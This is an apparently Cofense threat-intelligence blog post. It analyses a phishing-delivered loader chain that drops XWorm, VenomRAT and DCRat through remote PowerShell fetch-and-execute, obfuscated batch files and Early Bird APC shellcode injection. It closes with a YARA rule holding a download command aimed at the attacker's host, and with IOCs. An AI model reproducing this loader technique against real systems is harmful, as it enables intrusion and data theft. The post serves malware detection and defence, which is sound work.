PythonRatLoader: The Proprietor of XWorm and Friends

October 30, 2024

PythonRatLoader

Authors: Adam Martin and Kian Buckley Maher

Introduction

The Cofense Phishing Defense Center (PDC) has uncovered a sophisticated attack that leveraged multiple layers of obfuscation and evasion techniques to distribute and execute VenomRAT. However, this attack campaign didn’t end with VenomRAT because the subsequently loaded plugin continued to deploy various types of malware into the victim’s environment.

Additionally, the PDC team recently identified a phishing campaign that uses multiple layers of evasion techniques to deploy various malware into an infected environment. This campaign is aimed at employees and poses as a customer requesting a service. The email uses urgent language to deceive a victim into clicking a malicious attachment, initiating a series of harmful activities, and deploying several types of malware. All the malware in this attack uses the same packing and obfuscation techniques. The deployed malware includes XWorm, VenomRAT, AsyncRAT, and DCRat. 

As illustrated in Figure 1, our initial threat vector is a download link to a “PDF” file purporting to be a general invoice, luring the potential victim into accessing the malicious URL. 

PythonRatLoader

Figure 1 Initial Threat Vector

Once accessed, an internet shortcut file will be automatically downloaded to the default downloads directory. This shortcut file is used to navigate the victim to the remote server. This is possible because Windows Explorer permits browsing through the WebDAV protocol, which allows users to access, edit, and download from remotely hosted web servers.

PythonRatLoader

Figure 2   Internet Shortcut File

The file:// URL points to a WebDAV service hosted via Cloudflare's tunneling system. By opening the shortcut, a user would have remote file access to the /Dev directory over SSL/TLS, as illustrated in Figure 2. 

While conducting this analysis, the base URL hosting the content was accessible, as per Figure 3. 

Picture4.png

Figure 3 Hosted Malicious Directory

Once the shortcut file is accessed, the user will be prompted with a Network directory view. The “PDF” being displayed is, in fact, being accessed via the WebDav protocol on the hosted server rather than being hosted locally.

 Picture5.png

Figure 4 "PDF" File Download to Network Folder

 The “PDF” is really a PowerShell script which will do the following:

  • Use PowerShell to download and execute a batch script from a remote server via a hidden command.Mad.
  • Fetch the batch script from a Cloudflare-hosted URL (principles-yours-respected-skirt[.]trycloudflare[.]com), achieved using the same WebDAV Method as the first URL.
  • Employ Invoke-Expression (iex) to run the batch file’s contents, achieving remote code execution.
  • Use directory traversal and hidden window flags to evade detection.

Picture6.png

Figure 5 Extracted script

This will prompt a download via msedge.exe for corn.bat, which is obfuscated with BatchShield, an open-source batch script obfuscator available on GitHub. The obfuscated version and deobfuscated version can be found in Figures 5 and 6, respectively. BatchShield uses a simple form of string obfuscation where % symbols and obfuscated characters replace meaningful batch script commands and variables. 

Breakdown:

  1. The script looks for PDF files in the downloads folder and sets the first one it finds as the variable pdfFile.
  2. Once a file is found, it opens the file using the start command.
  3. The script then sets a URL for a ZIP file download (zipUrl) and a download location (destination).
  4. Using PowerShell's Invoke-WebRequest, it attempts to download the ZIP file from the given URL to the specified location. In this case, the Python 312 folder is downloaded and hidden on AppData/Roaming. 

 

Picture7.png

Figure 6 Obfuscated corn.bat

Picture8.png

Figure 7 Decoded corn.bat

Breakdown: 

  • PDF File Search: The script searches the user's downloads folder for any files with a .pdf extension, using a for loop to iterate over the found files.
  • Variable Assignment: Upon finding a PDF file, it assigns the path of the first PDF file found to the variable pdfFile and immediately jumps to the openPdf label to execute the subsequent commands.
  • Open PDF: The script prints a message indicating the PDF file is being opened and uses the start command to open the file with the default PDF viewer on the system.
  • ZIP File Variables: It defines a URL (zipUrl) for a ZIP file to be downloaded and specifies a destination path (destination) in the downloads folder where the ZIP file will be saved.
  • Download ZIP File: Using PowerShell, the script attempts to download the ZIP file from the specified URL and save it to the designated location, handling any potential errors during the download process with a try-catch block to exit if an error occurs.

The embedded Python payload contains a mix of standard Python dependencies along with three payload files, as per Figure 8. The ones of concern are xw.py, xo.py, and ch.py. 

Picture9.png

Figure 8 Python 312 Payload

 

A new .bat file is downloaded, which contains all of the components necessary for a modular and multistage attack to take place. 

Picture10.png

Figure 9 Update.bat used to run Python Payload

Update.bat breakdown: 

  • The script checks if it's already running with a flag (MY_FLAG). If not, it restarts itself in a minimized window.
  • It changes the working directory to a specific Python folder in downloads.
  • It runs three Python scripts sequentially: ch.py (DCRAT), ex.py (VenomRAT), and xw.py (XWorm).
  • It terminates the cmd.exe process to close the command window.

From here, we can analyze the running process of xw.py, the malicious Python script payload for XWorm. The script is heavily obfuscated using “KRAMER,” an open-source Python script obfuscator. When running the script in isolation, the command prompt will remain open, allowing us to analyze a snippet of the methodology used for shellcode injection as per Figure 10. 

Picture11.png

Figure 10 Shellcode Injection

This is achieved through a process injection method known as Early Bird APC (asynchronous procedure queue) injection. In essence, the script creates a new process (Notepad.exe in this case) and injects the malicious code into it before the thread execution begins. This is done to evade antivirus detection due to the increased likelihood that antivirus software won’t detect this behavior so early in the application initialization phase.

From here, we can analyze the memory strings of xw.py to bypass some of the encryption and view its instructions at run time. 

Picture12.png

Figure 11 Decrypted xw.py snippet

  • Shellcode Decryption: The function rc4_decrypt is called with the encoded key and encrypted_data to obtain the decrypted shellcode.
  • Memory Allocation: A mutable memory buffer is created using ctypes.create_string_buffer to store the decrypted shellcode.
  • Memory Permission Adjustment: The VirtualProtect Windows kernel API call is used to change the memory permissions of the buffer to PAGE_EXECUTE_READWRITE, allowing execution of the shellcode.
  • Shellcode Execution: The decrypted shellcode is cast to a callable function and executed.

 

 Picture13.png

Figure 12 Process Injection to Notepad.exe

Examining the memory strings of this process at runtime allows us to confirm that this sample makes an outbound connection request to an XWorm C2 along with string

references to XWorm. It’s worth noting that each Python script will execute and inject into an individual notepad.exe process. The related Notepad processes were seen to be DCRAT and VenomRAT. 

 

Picture14.png

Figure 12 Spawned Notepad Processes

Picture15.png

Figure 13 XWorm String Detected via YARA Rule Match

Picture16.png

Figure 14 Confirmation of XWorm from xw.py 


Attack Flow

Picture17.png

Conclusion

While the methods deployed in this attack are nothing new in the world of malicious loaders, the ways in which they are being utilized here shows an increased level of complexity. The use of several real/fake file types, along with silent PowerShell execution and significant obfuscation of code, gives PythonRATLoader the ability to enter victim systems and cause a serious level of damage to any organization infected before the attack can be caught and isolated by traditional endpoint monitoring, detection, and remediation systems. 

In our investigation we went into a deep dive on activity spawning from the ‘xw.py’ script, but the other two payloads will spawn their own version of the ‘Notepad.exe’ and inject different versions of shellcode by abusing the same APC Queue exploit, ‘ch.py’ will spawn a version of DCRAT and ‘ex.py’ will spawn a version of VenomRAT, each of these is incredibly destructive in its own way. 

The Cofense PDC recommends maintaining a high level of email security awareness among users to prevent attacks like this because the initial infection vector continues to be very well-crafted phishing emails that, through their perceived innocuous nature, lull users into a false sense of security. Once access is gained, detection and remediation become significantly more time-consuming and costly. 

It is important to teach users to be highly aware of any emails being received containing: 

  • Unexpected ZIP/HTML/Office Doc files.
  • URLs not used in regular day-to-day operations.
  • Urgent, sympathetic, or threatening language.
  • Differences in writing styles used by senders known to the user.
  • Unusual/unexpected email addresses from free providers such as Gmail, Yahoo, and Yandex.
  • Aliases that have no relation to the email address used or the context in which it was received.

These are common tactics used in malicious emails of any type, ranging from Malware to BEC (Business Email Compromise), and knowing how to recognize them can save an organization from serious damage. Suspicions of any kind should be reported to your security team immediately for awareness and remediation.

Teach your employees to spot these attacks and prevent them at the source with Cofense’s comprehensive suite of email Reporting and Response Tools, Phishing Simulations, and PhishMe Security Awareness Training (SAT.)

MITRE ATT&CK

PythonRATLoader 

Techniques

Description

Tactic

Command and Scripting Interpreter: PowerShell

T1059.001

The RATLoader will execute silent PowerShell commands.

Execution

Phishing – T1566

The Initial infection vector noted in our investigation is an impersonal phishing email.

Initial Access

User Execution: Malicious Link/Malicious File - T1204

Initial Payload is pulled using a malicious URL present on the phishing email.

Execution

Deobfuscate/Decode Files or Information – T1140

The initial .bat file is heavily obfuscated to prevent detection by automated systems and to slow analysis.

Defense Evasion

Command and Scripting Interpreter: Python – T1059.006

The Python dependencies needed for execution are included in the malicious .zip file.

Execution

 

XWorm

Techniques

Description

Tactic

Command and Scripting Interpreter: PowerShell

T1059.001

XWorm will gain initial persistence using silent PowerShell commands.

Execution

Process Discovery – T1057

XWorm will pull system information about running programs.

Discovery

Account Discovery – T1087

XWorm will pull account information present on the victim machine. 

Discovery

 

Browser Information Discovery – T1217

XWorm will pull information present in the browser and store it for exfiltration.

Discovery

Input Capture: Keylogging – T1056.001

User interactions with keyboards and other peripherals are logged and stored for exfiltration by XWorm.

Collection

Privilege Escalation – T1068

XWorm will attempt to bypass account controls and give itself administrator access.

Privilege Escalation

Boot or Logon AutoStart Execution – T1547

XWorm will add itself to start-up programs.

Persistence

Exfiltration Over C2 Channel – T1041

XWorm will exfiltrate all collected information over an encrypted C2 connection.

Exfiltration

 

YARA Rule

strings:

$file1= “/usr/bin/python /tmp/ch.py”

$file2= “xterm -hold -e /usr/bin/python /tmp/ch.py”

$file3= “/usr/bin/python /tmp/xw.py”

$file4= “xterm -hold -e /usr/bin/python /tmp/xw.py”

$powershell1= “Invoke-WebRequest -Uri 'https://principles-yours-respected-skirt.trycloudflare.com/”

condition:

any of ($file*) or $powershell1

 

IOCs

URL

IP Address

hXXps://principles-yours-respected-skirt[.]trycloudflare[.]com/

104.16.231.132

hXXps://dl[.]dropboxusercontent[.]com/scl/fi/

uc4m6iiv8h3raopsr6xd0/RE019290049022PDF.zip

 

162.125.3.15

file://puzzle-photographers-nitrogen-rod[.]trycloudflare[.]com@SSL/DavWWWRoot/DE

104.16.231.132

 

Type

Information

File Name:

corn.zip
 

MD5:

fa30434fcbe067ad524ca1c00dcbca01
 

SHA256:

6ccf65d9be4b65d1f2ae3db67416dbca

392be8ec633f895e250ab25bee7bb500

File Size:

43313386

File Name:

RE019290049022PDF.zip
 

MD5:

9742f6929bba7d013daae4c5fc2547ee

SHA256:

19b1574f42e4155ab7d9c4b42b6b0346

468ed60510cc92d8d9318e48f79d335d

File Size:

514

File Name:

update.bat
 

MD5:

ba9d0ceb4bef463f86099709235d9a0e

SHA256:

5e7e80bfd085b588ccf9d4f0dd379446b

0944b5d7ee7d100a7ebca08dbfafc5f

File Size:

352

File Name:

corn.bat

MD5:

e026c362ee2d4c066e2f564254560a03

SHA256:

351ebfe9c81cb911f68c4738ba9e6106d

3f2890979995e3dfe8ecf0188edc369

File Size:

69831

File Name:

xw.py

MD5:

4e2841b499fd642a1e10bf8540be522e

SHA256:

f5f50355b4d0379b1234926671c998b13

6d2e72e59e971494b6e75a256ac54e7

File Size:

4384033

File Name:

xo.py

MD5:

a32d7f8db33801d0325eeaa6c4a43e64

SHA256:

15bf9c3290ac7c2395a14d6bb0570a68f

83309dd938f57b21c6ac3a2370eba47

File Size:

4715810

File Name:

ch.py

MD5:

d1ba417dd1d23b33a3210e9f22a5a099

SHA256:

0bec44ecff47a25b55341fde509a44ef79

c27bf791b99eb0d27a604098c6439c

File Size:

4715830